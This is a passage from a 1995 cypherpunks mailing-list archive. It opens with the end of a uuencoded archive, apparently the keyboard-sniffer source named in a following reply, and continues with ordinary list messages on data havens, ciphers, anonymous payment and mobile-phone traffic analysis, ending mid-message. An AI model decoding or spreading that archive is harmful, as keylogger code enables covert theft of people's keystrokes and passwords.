M.ZWBQA]J8&1]6&6\@D0ROFT8KT$A)30%L6\`(?IS""!WU*-61$_=.(O&:PT9
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MUS0;'`90NP68U<KBO[*;ES5`</(D`(B]M"19I)*D'*#[0`N(%@!E,.SD3S?Q
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MD'"Y*T2,D@/.>./T*GF,DPFC[#5!^2R$QCBR$S7K`-_[]N@\\!(P%($U<;9:
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
M<#@S=]@DPK55+LN<@XFK9@=\4VQUW4+`_$+,/:=,J;M]W91Z-_/XAOWAZ-TJ
M7CX&PW)I7%.V*TO-=,`;J&4J[2CGUDQ9_,BK)3/L<..6]6:#I<'2K6L:=LR"
MC6:!,.VG7C@#JW^&`;Y8(7&`+OKAA.T?32)OI`Q1$;=+NL3&C/=TQ.'MM3`B
MLYB'5P\_H\5#6R7,B[^.9UL739)\4L*<O-5O?ZN;X.H4LD:KN9"I:<_E<Q8R
M?!8U16@RL2EPNIH.P7[&70%CV23`[<0K-'=V@FW%K$$OX+F*0LA2UG>A:0]?
M]RL_6H&Z8OY#FI[2EZRI?60RLDW^.&MF,1_+NA+E$Q+9>TDZ3EIN.:;EP1LN
M*W&*L>99EU$TLL)1X"'W/X9S97^'&/T1CS=PFQ+W;`R')%R`X<R@W:IPV;2J
M=,@EKCUBF7XP0D=4A`3`2W2CB';][M1,&/G2^9<8H\GYE_S#&K>_#0_`-CD$
M,QR$I7.PH+-UE2YOXY2?\E-^RL\N/_\#4$L!`A0`%``"``@`=S//&@M(9P<%
M&P``D4<```<``````````0`@`````````&-O<'EI;F=02P$"%``4``(`"`!Y
M`2X>+45;!A0*```%&```"P`````````!`"`````J&P``:V5Y:&%N9"YT>'10
M2P$"%``4``(`"``1G2T>]PY^DK<%````,```"P`````````!`"````!G)0``
M='!A<V-A;"YT87)02P$"%``4``(`"`#GG"T>JG\\`/DG````\```#```````
M```!`"````!'*P``:V)I<W)S<F,N=&%R4$L%!@`````$``0`X0```&I3````
!````
`
end
sum -r/size 44244/29795 section (from "begin" to "end")
sum -r/size 20996/21601 entire input file



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Robert Rothenberg <rrothenb@libws4.ic.sunysb.edu>
Date: Fri, 13 Jan 95 12:38:45 PST
To: m00012@KANGA.STCLOUD.MSUS.EDU
Subject: Re: Keyboard sniffer source code
In-Reply-To: <0098A5EA.FA888140.1@KANGA.STCLOUD.MSUS.EDU>
Message-ID: <9501132038.AA17540@toad.com>
MIME-Version: 1.0
Content-Type: text


> 
> Not to be paranoid, but did anybody receive that program?
> 
> Does cypherpunkcs@toad.com have a pgp key?
> 
> I think it was intercepted.
> 
> mike
> 
Yep, and I've already got a couple of others like it from other sources.
I also posted a semi-solution to the problem. If it doesn't show up,
let me know and I'll repost it.

PGP Key available on request, or try keyservers (ID = 0xab1f4831)

  Rob




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Fri, 13 Jan 95 12:47:29 PST
To: cypherpunks@toad.com
Subject: NYT on MS Online Latest
Message-ID: <199501132046.PAA07929@pipe3.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


Peter Lewis writes today on latest MS Network online mighty joes, palming
Uunet for hi-speed hookup and Mosaic and Spyglass for joetoe-jam
web-peddling. 
 
See it by sending blank message with subject:  NEB_wet




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Matt Thomlinson <mattt@microsoft.com>
Date: Fri, 13 Jan 95 16:03:53 PST
To: cypherpunks@toad.com
Subject: FW: How do I know if its encrypted?
Message-ID: <9501140004.AA21059@netmail2.microsoft.com>
MIME-Version: 1.0
Content-Type: text/plain



----------
From:  <Ben.Goren@asu.edu>
To: Matt Thomlinson
Subject: Re: How do I know if its encrypted?
Date: Friday, January 13, 1995 12:27PM

At 9:35 AM 1/13/95, Matt Thomlinson wrote:
>make "handful of plaintext" -> "hash of the plaintext" and you've got yourself
>a decent system. :)
>
>(this way, alice can keep a hash of the plaintext, hash of the ciphertext, and
>a key around for recovery, without keeping ANY plaintext. Also, for someone
>to request the data, knowing part of the message won't work; now they've
>got to know the entire message to recreate the hash.

That would be a little more secure, but I'm thinking that the "handful of
plaintext" would be a random number of some kind that the user prepends to
the file before encrypting. This is kinder on the data haven's CPU; compare
even 3DES of, say, 256 bits to IDEA of a few megabytes followed by MD5 of
same. Plus, it offers the operator even more deniability: he doesn't even
look at the whole file, but just enough to be sure that it's what it's
supposed to be.

Presumably, the data haven will specify how much a handful is, and offer a
client program that generates all this automatically.

>matt

You sent this to me privately, so that's how I'm replying. If you don't
mind, though, please forward this on to the list.

b&

--
Ben.Goren@asu.edu, Arizona State University School of Music
 Finger ben@tux.music.asu.edu for PGP public key ID 0xCFF23BD5.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Joshua M. Sled" <jsled@eis.calstate.edu>
Date: Fri, 13 Jan 95 16:23:28 PST
To: cypherpunks@toad.com
Subject: C'punks slogan?
Message-ID: <Pine.3.89.9501131615.A7216-0100000@eis.calstate.edu>
MIME-Version: 1.0
Content-Type: text/plain


Mostly because I'm looking at having bumper stickers made, and partly 
because I'm testing a procmail script :), I want a few suggestions for a 
good slogan for the C'punks, something that would look good on a bumper 
sticker... stuff I've come up with so far is like:

sub rosa - Cypherpunks 1995
Support your local Cypherpunk
Privacy isn't a crime (I think I stole that from somewhere)
Ensuring privacy isn't a crime

And that's about it.... you should see by now why I'm asking. :)

Joshua M. Sled <jsled@ctp.org/jsled@free.org>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Thu, 12 Jan 95 21:46:02 PST
To: cypherpunks@toad.com
Subject: Re: Crypto functions
In-Reply-To: <9501122119.AA05796@doom.intuit.com>
Message-ID: <9501131633.ZM23442@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 12,  1:21pm, Mark Chen wrote:
> Among symmetric ciphers, there's GOST.

Using which S-boxes though?  Matt posted a set a while ago, although
I suspect they were the ones the Soviet public got, and probably not
overly secure.

Add the latest (91 I think) version of LOKI to the list.  Only a 64 bit key, but
still not bad, reasonably well studied, and free.

							Ian.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Paul Foley <Paul.Foley@vuw.ac.nz>
Date: Thu, 12 Jan 95 19:33:57 PST
To: cypherpunks@toad.com
Subject: Re: Anonymous payment scheme
In-Reply-To: <Pine.SUN.3.91.950111114155.10307B-100000@access3.digex.net>
Message-ID: <199501130333.QAA03633@akeake.its.vuw.ac.nz>
MIME-Version: 1.0
Content-Type: text/plain


Black Unicorn <unicorn@access.digex.net> wrote:

>> This is EXACTLY what I was contemplating. I really wish they would
>> implement it. Then I can get the traveler's cheques out of my wallet.
>> (unsigned in both spots of, course.)
>
>Is this not essentially the same as the current pre-paid long distance
>Phone cards on the market?
>
>One would think the transition as easy for the credit card companies to
>make with a secured, disposable visa card.

NZ Telecom are conducting an experiment with using phonecards in
softdrink vending machines.  There was an article in The Dominion
newspaper's _InfoTech_ magazine crying out for the Government to stop
it, claiming Telecom's creating an independent (from the Reserve Bank)
currency, will destroy the New Zealand economy, etc., etc.

---
Paul Foley <Paul.Foley@vuw.ac.nz>    -----    PGP encrypted mail preferred

                 PGP key available from keyservers or finger
                    (finger pfoley@akeake.its.vuw.ac.nz)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mats Bergstrom <asgaard@sos.sll.se>
Date: Fri, 13 Jan 95 07:36:05 PST
To: cypherpunks@toad.com
Subject: Cellular and Crime
Message-ID: <Pine.HPP.3.91.950113155933.27354A-100000@cor.sos.sll.se>
MIME-Version: 1.0
Content-Type: text/plain



There is this criminal trial going on in Stockholm concerning
a group of suspects that entered a bank vault through the roof
over a weekend in 1992. They have been prime suspects for a
long time but evidently it has taken a lot of time to build up
a case against them. Traffic analysis (but not tapping of the
actual conversations, GSM? - no mention of the system in the
news stories) plays a substantial role in the prosecution.
'A and B were at X at the same time','B and C were in the
vicinity of the Bank at this time' etc. The suspects have not
tried to argue that their cellulars were on loan to some stray
persons.

We all know that a booted cellular is a wonderful Area Locator.
(I wonder if the suspects knew?) But I have (naively) been
thinking that the authorities needed prior suspicion using
this feature in 'real time'. Judging from what has been written
about this trial the police must have requested, and received,
logged traffic data quite some time afterwards.

Perhaps they log it for ever?

Mats    




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ian Farquhar" <ianf@sydney.sgi.com>
Date: Thu, 12 Jan 95 22:01:10 PST
To: cypherpunks@toad.com
Subject: Re: FBI and BLACKNET
In-Reply-To: <HeW5lKjqRyHD077yn@mirage.skypoint.com>
Message-ID: <9501131639.ZM23450@wiley.sydney.sgi.com>
MIME-Version: 1.0
Content-Type: text/plain


On Jan 12, 11:05pm, Samuel Kaplin wrote:
